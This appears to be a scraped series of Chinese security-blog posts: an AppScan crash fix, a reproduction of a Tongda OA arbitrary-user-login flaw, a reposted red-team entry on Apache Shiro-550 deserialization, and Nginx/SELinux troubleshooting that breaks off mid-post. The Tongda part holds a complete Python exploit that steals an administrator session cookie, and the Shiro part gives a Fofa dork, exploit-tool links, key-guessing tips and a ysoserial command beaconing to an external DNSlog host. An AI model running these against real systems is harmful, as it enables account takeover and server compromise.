由于重装了系统,也重新装各种软件。在安装完appscan10后尚未crack,打开appscan,当载入到“正在装入:GuiLogic”后直接闪退。一开始以为是火绒和360后台杀进程,但是并未看到有任何相关日志。
在虚机里装了同样版本的win10,问题未复现,这就很奇怪了,在52翻到这个帖子:https://www.52pojie.cn/thread-969220-1-1.html,打开计算机-属性,查看本机的计算机名,存在中文字符,再看虚机里面的,并未出现中文字符,更改本地的计算机名appscan就正常打开了。
看来很多国外的软件对中文和特殊字符的支持确实不是那么友好(还有个burpsuite也有各种中文字符问题)。
通达OA任意用户登录漏洞复现
前言
有单位的系统被通报存在通达OA任意用户登录漏洞,由于系统不在本地在云上,帮忙验证了一下。
一、漏洞简介
未经授权的攻击者可以通过构造进行任意用户登录(包括admin),登录之后可进一步上传恶意文件控制网站服务器。
漏洞分析:https://mp.weixin.qq.com/s/yJuLhC1GxkMbGL0mRORIoA
二、漏洞影响
通达OA 2017、
通达OA V11.X--V11.5
三、复现过程
poc的思路
第一步:get
http://xxx.com/general/login_code.php拿到uid
第二步:posthttp://xxx.com/logincheck_code.php通过uid拿到cookie
第三步:gethttp:/xxx.com/general/index.php?is_modify_pwd=1替换获取的cookie实现任意用户登录
获取cookie的poc:
import requests
import argparse
import random
import warnings
import sys
import re
class Tond_da_poc():
def __init__(self,url):
self.url = url+'/'
self.user_agent =USER_AGENTS = [
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
"Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
self.payload_url_uid = '/general/login_code.php'
self.payload_url_cookie = '/logincheck_code.php'
self.headers= {'headers':random.choice(self.user_agent)}
self.vulhub = False
def get_tongda_uid(self):
url =self.url+self.payload_url_uid
r = requests.get(url=url,headers=self.headers,verify=False).text
print('[*] Checking current URL UID' )
uid_txt =r.split('code_uid')
uid_compile = re.compile(r'"({.*})"')
try:
get_uid = re.findall(uid_compile,r)
if len(get_uid) > 0:
print('【+】 Get current uid successfully',get_uid[0])
self.vulhub = True
return get_uid
else:
print('[-] Failed to get current UID')
except Exception as error:
pass
def get_tongda_cookies(self):
url =self.url +self.payload_url_cookie
data = {'CODEUID':self.get_tongda_uid(),'UID':1}
r =requests.post(url,data=data,headers =self.headers,verify=False)
try:
if r.headers['Set-Cookie'] != None and self.vulhub != False:
tongda_cookie =r.headers['Set-Cookie']
print('【+】 Get session of current URL successfully',tongda_cookie)
else:
print('[-] Failed to get session of current URL')
except Exception as error:
pass
def run(self):
self.get_tongda_cookies()
if __name__ == '__main__':
warnings.simplefilter("ignore")
if (len(sys.argv)) < 2:
print('useage : python' +str(sys.argv[0]) + ' -h')
else:
parser =argparse.ArgumentParser()
parser.description ='通达OA < 11.5版本 任意用户登录'
parser.add_argument('-u',help="待检测url -> example http://127.0.0.1",type=str,dest='check_url')
args =parser.parse_args()
aa = Tond_da_poc(args.check_url)
aa.run()
2020攻防演练弹药库
写在前面
本文来自斗象,仅做转载备份用。
Apache Shiro RememberMe 反序列化导致的命令执行漏洞 (Shiro-550, CVE-2016-4437)
1. 漏洞简介
Apache Shiro 是企业常见的Java安全框架, 其漏洞在2019年攻防演练中起到显著作用
2. 影响组件
Apache Shiro (由于密钥泄露的问题, 部分高于1.2.4版本的Shiro也会受到影响)
3. 漏洞指纹
set-Cookie: rememberMe=deleteMe
或者URL中有shiro字样
有一些时候服务器不会主动返回 rememberMe=deleteMe, 直接发包即可
4. Fofa Dork
app="Apache-Shiro"5. 漏洞分析
【漏洞分析】Shiro RememberMe 1.2.4 反序列化导致的命令执行漏洞
https://paper.seebug.org/shiro-rememberme-1-2-4/
6. 漏洞利用
wyzxxz/shiro_rce: shiro rce 反序列 命令执行 一键工具
https://github.com/wyzxxz/shiro_rce
Apache Shiro回显poc改造计划
https://mp.weixin.qq.com/s/-ODg9xL838wro2S_NK30bw
7. 利用技巧
1.使用多个泄露的key进行遍历, 这个在实战中确实有效
关于Shiro反序列化漏洞的延伸—升级shiro也能被shell
https://mp.weixin.qq.com/s/NRx-rDBEFEbZYrfnRw2iDw
Shiro 100 Key
https://mp.weixin.qq.com/s/sclSe2hWfhv8RZvQCuI8LA
2.使用 URLDNS 进行检测提速
使用适应性最强的URLDNS(这个不受JDK版本和安全策略影响, 除非网络限制不能出DNS)进行检测
且可以使用ysoserial提前生成序列化内容
java -jar target/ysoserial-0.0.5-SNAPSHOT-all.jar URLDNS "http://1234567890.test.ceye.io" > urldns.ser然后使用占位符+目标url hash的方法修改序列化内容中的urldns地址
提高检测速度以及后续检测无需使用ysoserial
例如 1234567890.test.ceye.io 可以换成 md5('www.qq.com').hexdigest() [:10].test.ceye.io
也就是 9d2c68d82d.test.ceye.io
可以预先记录 hash
9d2c68d82d www.qq.com然后进行hash查表就可以知道是DNSLOG来自哪个目标, 性能会提高不少
3.已知目标使用了Shiro, 可以采取Shiro-721的报错逻辑来进行遍历key — 星光哥
这样即使DNS不能出网, 也可以通过是否返回 rememberMe=deleteMe 来断定 shiro key 的正确性, 前提是服务器有rememberMe=deleteMe相关回显
8. 防护方法
1.升级Shiro到最新版
2.升级对应JDK版本到 8u191/7u201/6u211/11.0.1 以上
3.WAF拦截Cookie中长度过大的rememberMe值
Nginx报错client intended to send too large body
问题描述:
迁移完服务器后,发现无法上传大文件,查看Nginx日志发现如下报错
[root@localhost ~]# cat /var/log/nginx/error.log
2020/04/16 10:12:40 [error] 14173#14173: *2680 client intended to send too large body: 2045031 bytes, client: 192.168.1.1, server: localhost, request: "POST /index.php?mod=explorer&op=ajax&operation=uploads&container=584 HTTP/1.1", host: "xx.cn", referrer: "http://xx.cn/"看来是Nginx限制了上传文件的大小。
解决办法:
默认配置完Nginx未配置上传文件大小限制,修改Nginx配置文件,在HTTP{}中添加client_max_body_size字段,设置上传文件大小
[root@localhost ~]# vi /etc/nginx/nginx,conf
user nginx;
worker_processes 1;
error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;
events {
worker_connections 1024;
}
http {
include /etc/nginx/mime.types;
default_type application/octet-stream;
log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
access_log /var/log/nginx/access.log main;
sendfile on;
#tcp_nopush on;
keepalive_timeout 65;
#gzip on;
client_max_body_size 100m;
include /etc/nginx/conf.d/*.conf;
}
[root@localhost ~]# nginx -s reload重载Nginx后发现可以正常上传了
SELinux对Nginx的影响
新安装的centos7,通过yum安装Nginx,更改/etc/nginx/conf.d下的配置文件中默认root路径/usr/share/nginx/html,发现不管修改为什么路径即使赋予777权限,均提示403:
尝试修改Nginx配置文件中的user为root:
[root@localhost ~]# cat /etc/nginx/nginx.conf
user root;
worker_processes 1;
error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;
events {
worker_connections 1024;
}
http {
include /etc/nginx/mime.types;
default_type application/octet-stream;
log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
access_log /var/log/nginx/access.log main;
sendfile on;
#tcp_nopush on;
keepalive_timeout 65;
#gzip on;
include /etc/nginx/conf.d/*.conf;
}重载Nginx配置,重启Nginx发现问题依旧,查看Nginx状态并检查配置文件: